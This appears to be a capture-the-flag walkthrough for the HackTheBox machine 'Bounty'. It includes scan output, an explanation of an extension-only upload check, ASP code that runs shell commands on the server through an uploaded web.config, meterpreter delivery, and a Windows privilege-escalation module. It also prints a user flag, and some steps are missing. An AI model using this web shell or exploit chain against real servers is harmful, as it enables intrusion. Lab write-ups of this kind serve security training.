Nmap scan report for 10.10.10.93 Host is up (0.051s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Bounty Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
- Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.93 + Target Hostname: 10.10.10.93 + Target Port: 80 + Start Time: 2018-06-17 16:06:26 (GMT2) --------------------------------------------------------------------------- + Server: Microsoft-IIS/7.5 + Retrieved x-powered-by header: ASP.NET + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727 + No CGI Directories found (use '-C all' to force check all possible dirs) + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ 7502 requests: 2 error(s) and 7 item(s) reported on remote host + End Time: 2018-06-17 16:14:32 (GMT2) (486 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD> <BODY><h2>Requested Range Not Satisfiable</h2> <hr><p>HTTP Error 416. The requested range is not satisfiable.</p> </BODY></HTML> * Connection #0 to host 10.10.10.93 left intact
But the actual DoS exploit is not working on the image because the image is less than 256 KB.
The transfer.aspx is the only one accessible and contains a form upload.
We must first guess what kind of file the form accepts.
The form validates the uploaded file only by its extension and will put the file into the folder /uploadedfiles/ (IIS is case insensitive) with the same name+extension of our uploaded file.
If the file is not a valid PNG we get: The image "http://10.10.10.93/uploadedfiles/text.png" cannot be displayed because it contains errors.
From burp we got: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8.
Which will returns 3 if the upload and run is correct. Next step is to run some shell commands using the object WScript.Shell from .NET framework
1 2 3 4 5 6 7
Set objShell = CreateObject("WScript.Shell") command = "ipconfig" Set objCmdExec = objshell.exec("cmd /c" & command) getCommandOutput = objCmdExec.StdOut.ReadAll Response.write("-"&"->") Response.Write(getCommandOutput) Response.write("<!-"&"-")
Actually the command runs successfully! We had a RCE!
With the command wmic OS get OSArchitecture we was able to get the architecture of the system: 64-bit and with where /r c:\ *.txt we discovered the user flag in c:\Users\merlin\Desktop\user.txt and with type c:\Users\merlin\Desktop\user.txt we got the first flag: e29ad89891462e0b09741e3082f44a2f.
For the root flag we need to access directly to the machine so using metasploit we crafted a payload to web deliver the meterpreter executable:
Uploading this file and then curl http://10.10.10.93/uploadedfiles/web.config we got a session
and migrate to another process to avoid being kicked out.
Once we got the merlin user shell we used the metasploit module to find some feasible exploit on the machine with use post/multi/recon/local_exploit_suggester; we then tried the exploit exploit/windows/local/ms10_092_schelevator